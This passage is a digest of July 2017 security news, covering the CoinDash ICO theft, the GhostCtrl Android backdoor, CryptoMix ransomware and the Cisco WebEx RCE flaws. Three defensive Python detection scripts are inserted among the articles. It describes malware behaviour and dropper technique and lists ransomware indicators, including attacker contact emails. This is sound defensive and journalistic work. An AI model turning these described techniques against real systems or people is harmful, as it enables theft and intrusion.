“The CoinDash Token Sale secured $6.4 Million from our early contributors and whitelist participants and we are grateful for your support and contribution. CoinDash is responsible to all of its contributors and will send CDTs reflective of each contribution. Contributors that sent ETH to the fraudulent Ethereum address, which was maliciously placed on our website, and sent ETH to the CoinDash.io official address will receive their CDT tokens accordingly,” the company says.

However, CoinDash said that it would not compensate users who sent funds to the fraudulent address after the website was shut down.

At the moment the hacker’s wallet shows a balance of 43,488 Ethereum, currently worth around $8.1 million. CoinDash suggested that around $7 million of these funds were sent in by its users, but the amount could be higher, as some users might have sent funds after the hack was discovered.

“During the attack $7 Million were stolen by a currently unknown perpetrator. […] We are still under attack. Please do not send any ETH to any address, as the Token Sale has been terminated,” the company notes on its website.

CoinDash says it is currently investigating the breach and will provide more details on it as soon as possible. The company also posted a form for those who sent money to the hacker to complete.

The incident is yet another reminder that “blockchain technology in isolation cannot assure additional security,” but in fact increases risks, High-Tech Bridge CEO Ilia Kolochenko told SecurityWeek in an emailed comment.

“Many users, fooled by investors and so-called serial entrepreneurs, blindly believe that blockchain, particularly crypto-currencies, can make a digital revolution and provide an ‘unbreakable’ security. Unfortunately, this assumption is wrong and leads to a very dangerous feeling of false security. Blockchain technology can assure a very high level of data integrity, but we need to remember the numerous intertwined layers of modern technology stack, where one breached system or host can put the entire structure at risk,” Kolochenko said.

“Victims of this hack will quite unlikely get their money back as, technically speaking, it's virtually impossible. Moreover, law enforcement won't be able to help either in this case, except if it is an insider attack that can be investigated and prosecuted,” he concluded.


Android Backdoor GhostCtrl can spy on victims and take over Windows Systems
18.7.2017 securityaffairs Android

The GhostCtrl backdoor is an OmniRAT-based Android malware that can spy on victims, steal data and take over Windows systems together with the RETADUP infostealer.
Today’s smartphones are as powerful as the computers of only a few years ago. Unfortunately, that also means that Android phones see as much malware as desktop and laptop computers. In 2016, Kaspersky Lab registered nearly 40 million attacks by malicious mobile software. Since smartphones are essentially full computers in your pocket, the bad guys are able to use many of the same techniques and sometimes even the same tools. In late 2015 researchers at Avast discovered bad guys using the OmniRat remote administration tool (RAT) to compromise Android phones. On its own OmniRat is not malicious: it is a very capable tool for IT staff to provide remote support to Android users and even allows remote access to Windows, Linux and Mac systems. It was also a very good tool for the bad guys to access your systems.

After several quiet months, OmniRat variants have been spotted in the wild and the software has benefitted from some significant updates since we last saw it. Dubbed GhostCtrl by Trend Micro researchers, it can do some “traditional” mobile malware things like:

Upload and download files to or from the bad guys’ servers
Send SMS messages to specified numbers (usually extra fee numbers)
Provide real time sensor data
As well as some very cool, and scary new things like:

Control the system infrared transmitter
Surreptitiously record voice, audio or video
Use the text-to-speech feature (i.e. translate text to voice/audio)
Clear/reset the password of an account specified by the attacker
Make the phone play different sound effects
Terminate an ongoing phone call
Use the Bluetooth to search for and connect to another device.
“The information-stealing RETADUP worm that affected Israeli hospitals is actually just part of an attack that turned out to be bigger than we first thought—at least in terms of impact. It was accompanied by an even more dangerous threat: an Android malware that can take over the device.” states the analysis from Trend Micro.

“Detected by Trend Micro as ANDROIDOS_GHOSTCTRL.OPS / ANDROIDOS_GHOSTCTRL.OPSA, we’ve named this Android backdoor GhostCtrl as it can stealthily control many of the infected device’s functionalities.”

While this is scary enough, especially when you consider that a lot of bad guys out there are only now starting to think of creative ways to exploit these new capabilities, GhostCtrl doesn’t limit itself to Android devices. Compromising a smartphone gives you access to a powerful computer, but most bad guys are after information. GhostCtrl comes with the RETADUP worm, which was recently discovered stealing information from Windows systems in Israeli hospitals.

“GhostCtrl’s combination with an information-stealing worm, while potent, is also telling. The attackers tried to cover their bases, and made sure that they didn’t just infect endpoints. And with the ubiquity of mobile devices among corporate and everyday end users, GhostCtrl’s capabilities can indeed deliver the scares.” continues Trend Micro.

How Do You Get Infected?

GhostCtrl comes as an Android Application Package (APK) masquerading as a legitimate Android app such as WhatsApp, Pokemon Go, MMS — anything that will appeal to users. When the wrapper APK is launched, it decodes text from its resource file, writes that string out as another APK and then launches this malicious APK, prompting the user to install it. It is easy to see how a user could be fooled or confused as to which file is asking to be installed and proceed anyway. Once the malicious software is installed, the wrapper APK runs it as a service with no visible icon, allowing the malware to run silently in the background.


Once the malicious application is running in the background, it contacts Command and Control (C&C) servers on the Internet to determine its next actions, as described above. Depending on the infected target and the motivations of the bad guys, the GhostCtrl malware could be used for any number of malicious activities. If the infected phone is only used by an individual at home, ransomware at the lock screen or pay-for-use SMS messaging is a good bet. However, since GhostCtrl has also been linked with RETADUP, bad guys could find themselves with an Android-based back channel into a Windows environment inside an enterprise, which offers many more opportunities for money making.

There have already been three versions of the GhostCtrl RAT identified in the wild, each adding features and capabilities to the previous version. You should expect that it will continue to be enhanced as it continues to be successful in making money for the authors. And while the Google Play store has hosted malware for brief periods of time, it is unlikely that an APK downloaded from the official Play Store will be GhostCtrl. If you are getting your APKs from anywhere else, you should brace for the worst.
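The wrapper technique described above (a resource string that decodes to a second APK which is then installed) is something an analyst can check for statically. The following Python script is an added example, not code from the article or from Trend Micro: it opens an APK (which is a ZIP archive), and flags any entry that is itself a ZIP or DEX file, either raw or base64-encoded, outside the expected top-level classes.dex. The sample "wrapper" it scans is constructed in memory; the file names and sizes are illustrative assumptions, not indicators from the real GhostCtrl samples.

```python
import base64
import io
import re
import zipfile

ZIP_MAGIC = b"PK\x03\x04"   # local file header of a ZIP/APK archive
DEX_MAGIC = b"dex\n"        # Dalvik executable header
# Loose base64 shape: alphabet plus line breaks, optional padding (assumption: no MIME wrapping)
B64_RE = re.compile(rb"^[A-Za-z0-9+/\r\n]+={0,2}\s*$")
NORMAL_DEX = re.compile(r"^classes\d*\.dex$")  # expected top-level code files


def classify(blob):
    """Return 'zip', 'dex', 'base64-zip', 'base64-dex' or None for one archive entry."""
    if blob.startswith(ZIP_MAGIC):
        return "zip"
    if blob.startswith(DEX_MAGIC):
        return "dex"
    # Only try base64 on reasonably long, base64-looking content
    if len(blob) >= 64 and B64_RE.match(blob):
        try:
            decoded = base64.b64decode(blob)
        except ValueError:
            return None
        if decoded.startswith(ZIP_MAGIC):
            return "base64-zip"
        if decoded.startswith(DEX_MAGIC):
            return "base64-dex"
    return None


def find_embedded_payloads(apk_bytes):
    """List (entry name, kind) for entries that carry a nested APK/DEX payload."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        for info in apk.infolist():
            if info.is_dir() or NORMAL_DEX.match(info.filename):
                continue
            kind = classify(apk.read(info.filename))
            if kind is not None:
                findings.append((info.filename, kind))
    return findings


def build_sample_wrapper():
    """Constructed wrapper APK: a benign-looking outer archive whose res/raw text file
    is a base64-encoded inner APK. Everything here is placeholder content."""
    fake_dex = DEX_MAGIC + b"035\x00" + b"\x00" * 60
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("AndroidManifest.xml", b"<manifest/>")
        z.writestr("classes.dex", fake_dex)
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("AndroidManifest.xml", b"<manifest/>")
        z.writestr("classes.dex", fake_dex)
        z.writestr("res/raw/strings.txt", base64.b64encode(inner.getvalue()))
        z.writestr("assets/logo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
    return outer.getvalue()


if __name__ == "__main__":
    for name, kind in find_embedded_payloads(build_sample_wrapper()):
        print(f"suspicious entry {name}: {kind}")
```

Run it against a real APK by passing the file's bytes to find_embedded_payloads(); a hit in res/ or assets/ is not proof of malice (some legitimate apps bundle plugins), but it is exactly the shape of dropper the article describes and deserves a closer look.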


Hacker Uses A Simple Trick to Steal $7 Million Worth of Ethereum Within 3 Minutes
18.7.2017 thehackernews  Hacking


All it took was just 3 minutes and 'a simple trick' for a hacker to steal more than $7 Million worth of Ethereum in a recent blow to the cryptocurrency market.
The heist happened after an Israeli blockchain technology startup project for the trading of Ether, called CoinDash, launched an Initial Coin Offering (ICO), allowing investors to pay with Ethereum and send funds to its address.
But within three minutes of the ICO launch, an unknown hacker stole more than $7 Million worth of Ether tokens by tricking CoinDash's investors into sending 43438.455 Ether to the wrong address owned by the attacker.
How did the hacker do this? CoinDash's ICO posted an Ethereum address on the app's website for investors to pay with Ethereum and send funds to.
However, within a few minutes of the launch, CoinDash warned that its website had been hacked and the sending address was replaced by a fraudulent address, asking people not to send Ethereum to the posted address.
But before that warning went out, this small change of address had already redirected cryptocurrency that investors intended for CoinDash into the wallet of the hacker.
"It is unfortunate for us to announce that we have suffered a hacking attack during our Token Sale event," reads a statement posted on the company's official website.
"During the attack, $7 Million was stolen by a currently unknown perpetrator. The CoinDash Token Sale secured $6.4 Million from our early contributors and whitelist participants, and we are grateful for your support and contribution."
CoinDash doesn't know who is responsible for the attack, and the worst part is that the company is still under attack.
Investors are strongly advised NOT to send any Ether (ETH) to any address on the site, as CoinDash has terminated the Token Sale.
According to a CoinDash Slack channel screenshot posted to Reddit, CoinDash realised what was happening within 3 minutes, but it was too late.
Some people even believe that the incident was not a hack, rather an insider's job. One user said: "Is there any proof that this was a hack. What if Coindash put an address in and then cried hacker to get away with free ETH?"
The CoinDash website is offline, at the time of publication, and the company is asking affected investors who sent their Ether to the wrong address to collect the CoinDash token (CDT) by submitting information to this link.
However, investors sending Ether to any fraudulent address after the website was shut down will not be compensated.
"CoinDash is responsible to all of its contributors and will send CDTs [CoinDash Tokens] reflective of each contribution," the company noted.
"Contributors that sent ETH to the fraudulent Ethereum address, which was maliciously placed on our website, and sent ETH to the CoinDash.io official address will receive their CDT tokens accordingly."
This isn't the first time an ICO funding has been hacked. Last year, $50 Million disappeared after hackers exploited code weaknesses in the Decentralised Anonymous Organisation (DAO) venture capital fund.
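The CoinDash incident hinged on a single published payment address being swapped on a web page. A defender running a token sale can watch for exactly that: extract every Ethereum-shaped address from the served page, compare it with the allowlisted official address, and hash the page so any change trips an alarm. The Python below is an added example, not CoinDash's code; the addresses and HTML are constructed placeholders, not the real sale address or page.

```python
import hashlib
import re

# An Ethereum address is "0x" followed by 40 hex digits; case is not significant here
ADDRESS_RE = re.compile(r"\b0x[0-9a-fA-F]{40}\b")


def extract_addresses(html):
    """Set of lowercased Ethereum addresses found anywhere in the page text."""
    return {a.lower() for a in ADDRESS_RE.findall(html)}


def audit_payment_page(html, allowed_addresses, baseline_digest=None):
    """Compare the served page against the allowlisted address(es) and, optionally,
    against the SHA-256 of the page captured at launch.

    Returns a dict: 'unexpected' addresses on the page that are not allowlisted,
    'missing' allowlisted addresses that no longer appear, 'content_changed' when a
    baseline digest was given and the page differs, and the current 'digest'."""
    allowed = {a.lower() for a in allowed_addresses}
    found = extract_addresses(html)
    digest = hashlib.sha256(html.encode("utf-8")).hexdigest()
    return {
        "unexpected": sorted(found - allowed),
        "missing": sorted(allowed - found),
        "content_changed": baseline_digest is not None and digest != baseline_digest,
        "digest": digest,
    }


# Constructed sample data (placeholder addresses, not real wallets)
OFFICIAL_ADDRESS = "0x" + "1234567890abcdef" * 2 + "12345678"
ROGUE_ADDRESS = "0x" + "deadbeef" * 5
GOOD_PAGE = f"<p>Contribute by sending ETH to <code>{OFFICIAL_ADDRESS}</code></p>"
TAMPERED_PAGE = GOOD_PAGE.replace(OFFICIAL_ADDRESS, ROGUE_ADDRESS)


if __name__ == "__main__":
    baseline = audit_payment_page(GOOD_PAGE, [OFFICIAL_ADDRESS])
    print("launch snapshot:", baseline)
    later = audit_payment_page(TAMPERED_PAGE, [OFFICIAL_ADDRESS], baseline["digest"])
    if later["unexpected"] or later["missing"] or later["content_changed"]:
        print("ALERT: payment page no longer matches launch state:", later)
```

In practice the poller fetches the page from outside the hosting environment every few seconds during the sale (the article notes CoinDash noticed within about three minutes), so that a change on the web server is caught even if the attacker also controls the server's own monitoring.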


Lithuania to Extradite $100 Million Email Fraud Suspect to U.S.

18.7.2017 securityweek Hacking

A Lithuanian man who allegedly swindled $100 million (87 million euros) from tech giants Google and Facebook must be extradited to the United States, a court ruled on Monday.

"The court has ruled in favour of extraditing Lithuanian citizen Evaldas Rimasauskas to the United States for criminal prosecution," Judge Aiva Surviliene said.

The 48-year-old was arrested in March in the Baltic state at the request of US authorities, who accuse him of deceiving the two US firms in 2013-2015 by posing as a large Asia-based hardware vendor.

Facebook and Google are mentioned in the indictment, Rimasauskas's lawyer confirmed to AFP.

In a public statement, US prosecutors said Rimasauskas used "email accounts that were designed to create the false appearance that they were sent by employees and agents" of the Asian manufacturer.

He is also accused of forging invoices, contracts and letters to trick the companies into wiring over $100 million to overseas bank accounts under his control, according to prosecutors.

The scam was pulled off using deception and no Google systems were hacked, according to the California-based internet giant.

Google updated its internal processes to guard against similar incidents and recovered the money lost.

"We detected this fraud against our vendor management team and promptly alerted the authorities," a Google spokesman told AFP.

"We recouped the funds and we're pleased this matter is resolved."

Facebook did not respond to an AFP request for comment.

Rimasauskas faces a maximum of 20 years in jail if convicted, the judge said.

Rimasauskas's lawyer, Snieguole Uzdaviniene, said she would appeal.


Google Inviting 2-Step Verification SMS Users to Google Prompt

18.7.2017 securityweek Safety

Google this week will start inviting 2-Step Verification (2-SV) SMS users to try Google Prompt, its year-old method of approving sign-in requests on smartphones.

Launched in June 2016, Google prompt allows users to approve sign-in requests via 2-SV by simply tapping “Yes” on a prompt. Available for both Android and iOS users, Google prompt received an improvement in February 2017, when Google added real-time security information about the login attempt, such as when and where it was made.

Google Prompt offers 2-SV over an encrypted connection and provides users with additional security features as well, including the option to block unauthorized access to their account.

While 2-SV users can also log in by tapping a Security Key or by entering a verification code sent to their phone, in addition to using prompts, Google is now inviting those who receive an SMS on their phones to try Google prompts when they sign in.

“The invitation will give users a way to preview the new Google Prompts sign in flow instead of SMS, and, afterward, choose whether to keep it enabled or opt-out,” the Internet giant explains in a blog post.

In July last year, the National Institute of Standards and Technology (NIST) started deprecating SMS 2-step verification, just months after security researchers published a paper revealing that vulnerabilities in the mechanism expose it to simple bypass attacks.

“Overall, this is being done because SMS text message verifications and one-time codes are more susceptible to phishing attempts by attackers. By relying on account authentication instead of SMS, administrators can be sure that their mobile policies will be enforced on the device and authentication is happening through an encrypted connection,” Google notes.

According to the company, only 2-SV SMS users will receive the notification to test Google prompts, meaning that those using Security Key aren’t affected. The use of Google prompt requires a data connection. On iOS devices, it also requires the Google Search app to be installed. Enterprise edition domains can enforce security keys for more advanced security requirements.

“While users may opt out of using phone prompts when shown the promotion, users will receive follow-up notifications to switch after 6 months,” the company concludes.


CryptoMix Ransomware Variant EXTE Emerges

18.7.2017 securityweek Ransomware

A new variant of the CryptoMix ransomware was recently observed, appending the .EXTE extension to targeted files, security researchers warn.

Around for over a year, the CryptoMix ransomware family has seen numerous updates over time, but few major changes appear to have been made to it: although the ransom note and the extension used have been modified, the encryption method has remained nearly the same from one variant to the next.

Once executed on the victim’s computer, the ransomware drops a file in the ApplicationData folder, while also dropping the ransom note in the targeted files’ folders. The malware also adds a series of registry keys, creates a unique ID and sends it to a remote location, after which it starts encrypting files using AES encryption.

In the ransom note, the malware instructs users to contact the author via the provided email addresses, and asks them to pay the ransom amount in Bitcoin.

Discovered by Malwarebytes’ Marcelo Rivero, the latest malware variant uses the same encryption method as previous iterations, but does show some small updates, BleepingComputer’s Lawrence Abrams reveals.

The threat now appends the .EXTE extension to the encrypted files’ names, and uses a new ransom note named _HELP_INSTRUCTION.TXT (last year, CryptoMix used the HELP_YOUR_FILES.TXT ransom note). In this campaign, users are required to contact the ransomware authors at exte1@msgden.net, exte2@protonmail.com, and exte3@reddithub.com for payment information.

Earlier this month, a different variant of the malware was observed appending the .AZER extension to the encrypted files and using the _INTERESTING_INFORMACION_FOR_DECRYPT.TXT ransom note and webmafia@asia.com and donald@trampo.info email addresses.

Unlike previous variants, the AZER CryptoMix iteration performs no network communication and is completely offline. It embeds ten different RSA-1024 public encryption keys and uses one of them to encrypt the AES key it uses to encrypt the files.

The EXTE version, Abrams points out, also embeds the ten public RSA keys, meaning it too can work offline. The two variants emerged within about one week of each other, which shows that the actor behind this ransomware is highly active. Since the beginning of this year, at least three other CryptoMix variants have emerged: Wallet, CryptoShield, and Mole02.
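The article gives concrete host-level indicators for the EXTE and AZER variants: the extensions appended to encrypted files and the ransom note file names. Because these variants run fully offline, network detection does not help, so a file-system sweep is the practical check. The Python below is an added example, not BleepingComputer's or Malwarebytes' tooling: it walks a directory tree, flags files with the indicator extensions and note names from the article, and additionally measures byte entropy to surface AES-encrypted content under an extension it has not been told about (the 7.5 bits/byte threshold and the sample files are assumptions for the demo).

```python
import math
import os
import tempfile
from collections import Counter

# Indicators named in the article (extensions compared case-insensitively)
ENCRYPTED_EXTENSIONS = {".exte", ".azer"}
RANSOM_NOTE_NAMES = {
    "_HELP_INSTRUCTION.TXT",
    "_INTERESTING_INFORMACION_FOR_DECRYPT.TXT",
    "HELP_YOUR_FILES.TXT",
}
# Assumption: properly encrypted data is close to 8 bits/byte; documents and text are far lower
ENTROPY_THRESHOLD = 7.5


def shannon_entropy(data):
    """Bits per byte of the given bytes (0.0 for empty or single-valued input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def scan_tree(root, sample_size=4096):
    """Return indicator hits under root: known encrypted extensions, ransom notes,
    and otherwise-unnamed files whose leading bytes look like ciphertext."""
    result = {"encrypted_files": [], "ransom_notes": [], "high_entropy": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            if name.upper() in RANSOM_NOTE_NAMES:
                result["ransom_notes"].append(path)
                continue
            if ext in ENCRYPTED_EXTENSIONS:
                result["encrypted_files"].append(path)
                continue
            with open(path, "rb") as fh:
                head = fh.read(sample_size)
            # Skip tiny files: entropy estimates on a few bytes are meaningless
            if len(head) >= 1024 and shannon_entropy(head) >= ENTROPY_THRESHOLD:
                result["high_entropy"].append(path)
    return result


def build_sample_tree():
    """Constructed demo tree: one renamed/encrypted document, one ransom note, one
    ordinary text file and one random-content file with an unknown extension."""
    root = tempfile.mkdtemp(prefix="cryptomix_demo_")
    docs = os.path.join(root, "Documents")
    os.makedirs(docs)
    with open(os.path.join(docs, "budget.xlsx.EXTE"), "wb") as fh:
        fh.write(os.urandom(8192))                      # stands in for AES output
    with open(os.path.join(docs, "_HELP_INSTRUCTION.TXT"), "w") as fh:
        fh.write("constructed placeholder for the ransom note\n")
    with open(os.path.join(docs, "notes.txt"), "w") as fh:
        fh.write("quarterly planning notes\n" * 100)   # low entropy, should not fire
    with open(os.path.join(root, "photo.bin"), "wb") as fh:
        fh.write(os.urandom(4096))                      # ciphertext-like, unknown extension
    return root


if __name__ == "__main__":
    for category, paths in scan_tree(build_sample_tree()).items():
        print(f"{category}: {len(paths)} hit(s)")
        for p in paths:
            print("   ", p)
```

The entropy check is deliberately a second-tier signal: already-compressed media (JPEG, ZIP, MP4) also scores near 8 bits/byte, so in a real deployment it is combined with file-age and rename patterns rather than used alone.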


Critical WebEx Flaws Allow Remote Code Execution

18.7.2017 securityweek Vulnerebility

Cisco has updated the WebEx extensions for Chrome and Firefox to address critical remote code execution vulnerabilities identified by researchers working for Google and Divergent Security.

Google Project Zero’s Tavis Ormandy and Cris Neckar of Divergent Security, a former member of the Chrome Security Team, discovered earlier this month that the WebEx extension allows a remote attacker to execute arbitrary code with the privileges of the web browser due to some changes made recently by Cisco.

The security holes, tracked as CVE-2017-6753, were reported to the networking giant on July 6 and they were addressed roughly one week later with the release of version 1.0.12. On Monday, both Cisco and Google Project Zero published advisories detailing the flaws.

According to Cisco, the vulnerabilities are caused by a “design defect” and they can be exploited by an attacker by getting the targeted user to visit a specially crafted webpage. The browser extensions for WebEx Meetings Server, WebEx Centers and WebEx Meetings running on Windows are impacted.

Updates have also been released for the Internet Explorer version of the WebEx plugin, which shares components with the Chrome and Firefox versions, and the WebEx desktop application. Cisco has informed customers that workarounds are not available.

Cisco said it was not aware of any attacks exploiting the vulnerabilities. However, the advisory published by Google Project Zero includes technical details and a working exploit. It also includes details on how Cisco addressed the issues.

This is not the first time Ormandy has found a critical vulnerability in the WebEx plugins. The researcher discovered a remote code execution flaw in January, which led to Google and Mozilla temporarily removing the WebEx extension from their stores.

Cisco’s initial fix turned out to be incomplete and it took the company several days to release proper patches after Ormandy’s disclosure.


For the second time in the year, experts found a flaw in Cisco WebEx Extension
18.7.2017 securityaffairs Vulnerebility

For the second time in a year, a highly critical remote code execution vulnerability was found in the Cisco WebEx Extension.
For the second time in a year, a highly critical remote code execution vulnerability, tracked as CVE-2017-6753, was discovered in the Cisco Systems WebEx browser extension for Chrome and Firefox. The vulnerability could be exploited by attackers to remotely execute malicious code on a target machine with the privileges of the affected browser.

“A vulnerability in Cisco WebEx browser extensions for Google Chrome and Mozilla Firefox could allow an unauthenticated, remote attacker to execute arbitrary code with the privileges of the affected browser on an affected system.” reads the security advisory published by CISCO. “This vulnerability affects the browser extensions for Cisco WebEx Meetings Server, Cisco WebEx Centers (Meeting Center, Event Center, Training Center, and Support Center), and Cisco WebEx Meetings when they are running on Microsoft Windows.”
Cisco WebEx is one of the most popular communication tools used by businesses and internet users for online meetings, webinars, and video conferences. The extension has roughly 20 million active users.

The impact of the flaw is severe when you consider that the extension has more than 20 million installs.

The vulnerability was discovered by the well-known Google Project Zero hacker Tavis Ormandy and Cris Neckar of Divergent Security. The CVE-2017-6753 RCE vulnerability is due to a design bug in the WebEx browser extension; it could allow attackers to gain control of the affected system.

The exploitation of the vulnerability is quite simple: attackers just need to trick victims into visiting a web page containing specially crafted malicious code with a browser that has the affected WebEx extension installed.
“Earlier this week a former colleague from Chrome Security, Cris Neckar from Divergent Security, pointed out that there had been some changes to the way atgpcext worked, and it looked like there may be some new problems. I see several problems with the way sanitization works, and have produced a remote code execution exploit to demonstrate them,” Ormandy said. “This extension has over 20M [million] active Chrome users alone, FireFox and other browsers are likely to be affected as well.”
Cisco acknowledged the RCE flaw and has already patched it in the “Cisco WebEx Extension 1.0.12” update for Chrome and Firefox browsers.

It is important to highlight the absence of “workarounds that address this vulnerability.”
“Cisco has released software updates for Google Chrome and Mozilla Firefox that address this vulnerability. There are no workarounds that address this vulnerability.” continues the CISCO advisory.

According to the advisory, Apple’s Safari, Microsoft Internet Explorer, and Microsoft Edge are not affected by this RCE flaw. Cisco WebEx Productivity Tools, Cisco WebEx browser extensions for Mac or Linux, and Cisco WebEx on Microsoft Edge or Internet Explorer are not affected by the vulnerability.


Russian nation-state actors blamed for cyber attacks against Irish energy networks
18.7.2017 securityaffairs BigBrothers

Irish energy networks have been targeted by spear phishing attacks, Russian nation-state actors are the prime suspects for the cyber attacks.
Hackers have targeted Irish energy networks: senior engineers at the Electricity Supply Board (ESB), which supplies both Northern Ireland and the Republic, received spear phishing messages allegedly sent by a Russian threat actor linked to Russia’s GRU intelligence agency.
The news was reported by The Times; sources close to the newspaper confirmed that Russian nation state actors launched the attack to compromise control systems and take over the electricity grid.

“Hackers backed by the Russian government have attacked energy networks running the national grid in parts of the UK, The Times has learnt.” reported The Times.

“The hackers, who targeted the Republic of Ireland’s energy sector, intended to infiltrate control systems, security analysts believe. This would also have given them the power to knock out parts of the grid in Northern Ireland.”


Why Ireland?

Security experts believe that GRU hackers were testing their cyber capabilities against the country infrastructure. The nation state hackers may have been interested in destabilizing the country that also hosts European headquarters of IT giants like Apple, Google, and Facebook. US officials confirmed last week that Russian government hacking teams penetrated American nuclear and other energy companies.

Ireland’s National Cyber Security Centre is investigating the cyber attack, which according to the experts aimed to steal information and gather intelligence rather than to sabotage.

The news about the attack against the Irish energy networks was disclosed shortly after the FBI and Department of Homeland Security sent a joint alert to the energy sector warning of cyber attacks powered by Russian nation state actors against the US nuclear power plants.

According to the alert, “advanced, persistent threat actors” used spear phishing messages to steal login credentials and access the networks of companies in the energy industry.

According to a report on vulnerabilities in British defence released by the Royal United Services Institute (RUSI) earlier this month, the threat of cyber attacks continues to grow especially for Western satellite infrastructures. Military and civilian communications and GPS system could be targeted by hackers with a significant impact on the economy of the country.

Of course, Russia denied that state-sponsored hackers have been involved in attacks against Western governments or Ukraine. President Putin blamed patriotic Russian hackers for the interference with the 2016 Presidential Election.


Critical RCE Vulnerability Found in Cisco WebEx Extensions, Again — Patch Now!

17.7.2017 thehackernews Vulnerebility

A highly critical vulnerability has been discovered in the Cisco Systems’ WebEx browser extension for Chrome and Firefox, for the second time in this year, which could allow attackers to remotely execute malicious code on a victim's computer.
Cisco WebEx is a popular communication tool for online events, including meetings, webinars and video conferences that help users connect and collaborate with colleagues around the world. The extension has roughly 20 million active users.
Discovered by Tavis Ormandy of Google Project Zero and Cris Neckar of Divergent Security, the remote code execution flaw (CVE-2017-6753) is due to a designing defect in the WebEx browser extension.
To exploit the vulnerability, all an attacker needs to do is trick victims into visiting a web page containing specially crafted malicious code with a browser that has the affected extension installed.
Successful exploitation of this vulnerability could result in the attacker executing arbitrary code with the privileges of the affected browser and gaining control of the affected system.
"I see several problems with the way sanitization works, and have produced a remote code execution exploit to demonstrate them," Ormandy said. "This extension has over 20M [million] active Chrome users alone, FireFox and other browsers are likely to be affected as well."
Cisco has already patched the vulnerability and released “Cisco WebEx Extension 1.0.12” update for Chrome and Firefox browsers that address this issue, though "there are no workarounds that address this vulnerability."
"This vulnerability affects the browser extensions for Cisco WebEx Meetings Server, Cisco WebEx Centers (Meeting Center, Event Center, Training Center, and Support Center), and Cisco WebEx Meetings when they are running on Microsoft Windows," Cisco confirmed in an advisory released today.
Download Cisco WebEx Extension 1.0.12
Chrome Extensions
Firefox Extension
In general, users are always recommended to run all software as a non-privileged user in an effort to diminish the effects of a successful attack.
Fortunately, Apple's Safari, Microsoft's Internet Explorer and Microsoft's Edge are not affected by this vulnerability.
Cisco WebEx Productivity Tools, Cisco WebEx browser extensions for Mac or Linux, and Cisco WebEx on Microsoft Edge or Internet Explorer are not affected by the vulnerability, the company confirmed.
This is the second time this year that a remote code execution vulnerability has been discovered in the Cisco WebEx extension.
Ormandy alerted the networking giant to an RCE flaw in the WebEx browser extension earlier this year as well, which even led to Google and Mozilla temporarily removing the add-on from their stores.


New IBM Z Mainframe Designed to "Pervasively Encrypt" Enterprise Data

17.7.2017 securityweek Safety

New IBM Z14 Mainframe Introduces Encryption Engine Capable of Running More Than 12 Billion Encrypted Transactions Per Day

The combination of an explosion in data breaches and increasingly severe regulatory requirements requires a new approach to security: the mainframe is back. IBM has announced its latest mainframe, the IBM z14, in what it calls "the most significant re-positioning of mainframe technology in more than a decade."


Encryption is seen as the best solution for both data loss and regulatory compliance. But encryption is hard, requiring more time and processing power than most companies have at their disposal. At the same time, it is becoming an increasingly attractive solution. More than nine billion data records have been lost or stolen since 2013; and only 4% were encrypted. Next year, the General Data Protection Regulation (GDPR) could, in theory, impose fines of up to 4% of global turnover for the loss of unencrypted personal data.

A second regulation requiring widespread encryption is the NYSDFS cyber security regulation. This states, "As part of its cybersecurity program, based on its Risk Assessment, each Covered Entity shall implement controls, including encryption, to protect Nonpublic Information held or transmitted by the Covered Entity both in transit over external networks and at rest." 'Nonpublic Information' could almost be interpreted as 'everything'. The automatic facility to encrypt everything in transit and at rest -- as does the IBM Z -- will make its capabilities particularly attractive to banks and financial institutions that are governed by the New York State Department of Financial Services.

Encryption, where possible, is the one single solution that can solve both data loss (if it's encrypted, it's not lost) and compliance. IBM discussed the problem with 150 of its clients over three years and came up with its solution: a new mainframe with sufficient power and versatility to provide pervasive encryption.

IBM Z, says the firm, makes it possible, for the first time, for organizations to pervasively encrypt data associated with an entire application, cloud service or database in flight or at rest with one click. "The standard practice today," it says, "is to encrypt small chunks of data at a time, and invest significant labor to select and manage individual fields." But this approach doesn't scale, so encryption is often incomplete and/or inaccurate.

Encryption is only a solution, of course, if the decryption keys are kept safe. IBM Z offers what the company calls 'tamper-responding encryption keys'. Keys are invalidated at any sign of intrusion, and can be restored in safety. This key management system is designed to meet Federal Information Processing Standards (FIPS) Level 4 standards, and can be extended beyond the mainframe to other devices such as storage systems and servers in the cloud.

IBM's solution has been to introduce more power into a new mainframe: a massive 7x increase in cryptographic performance over the previous generation z13 -- driven by a 4x increase in silicon dedicated to cryptographic algorithms. "This is 18x faster than compared x86 systems (that today only focus on limited slices of data)," it claims, "and at just five percent of the cost of compared x86-based solutions."

These aren't the only large numbers associated with the new mainframe -- IBM claims it features the world's fastest microprocessor running at 5.2GHz. A single system can support more than 12 billion encrypted transactions per day; supports the world's largest MongoDB instance with 2.5x faster NodeJS performance than compared x86-based platforms; two million Docker Containers; and 1000 concurrent NoSQL databases.

Few companies will want to pay mainframe prices for compliance alone. However, IBM is also previewing new Z/OS software that aids with private cloud service delivery, enabling owners to transition from an IT cost center to a value-generating service provider.

It is also being incorporated into the IBM Cloud, where it will initially be used as an encryption engine for cloud services, and to run IBM blockchain services in six new centers in Dallas, London, Frankfurt, Sao Paulo, Tokyo and Toronto.

"The powerful combination of IBM Z encryption and secure containers differentiates IBM Blockchain services on the cloud by supporting the trust models new blockchain networks require,” said Marie Wieck, general manager, IBM Blockchain. "Enterprise clients also benefit from the ease of use making management transparent to the application and the user."


Industry Massively Underinsured Against Global Cyber Attacks: Study

17.7.2017 securityweek Cyber

Industry is massively underinsured against a major global cyberattack -- which could trigger losses on a par with natural disasters such as Hurricane (Superstorm) Sandy. This is one of the main conclusions of a study conducted by Lloyds of London (the world's oldest insurance organization with more than 20% of the global cyber insurance market), and Cyence (a risk modeling firm).

The report, "Counting the cost: Cyber exposure decoded" (PDF), examines two attack scenarios. In the first, attackers make a malicious modification to a hypervisor controlling the cloud infrastructure, which causes multiple server failures in multiple cloud customers. In the second, a zero-day vulnerability affecting an operating system with 45% share of the market is obtained by unidentified criminal groups that attack vulnerable businesses for financial gain.

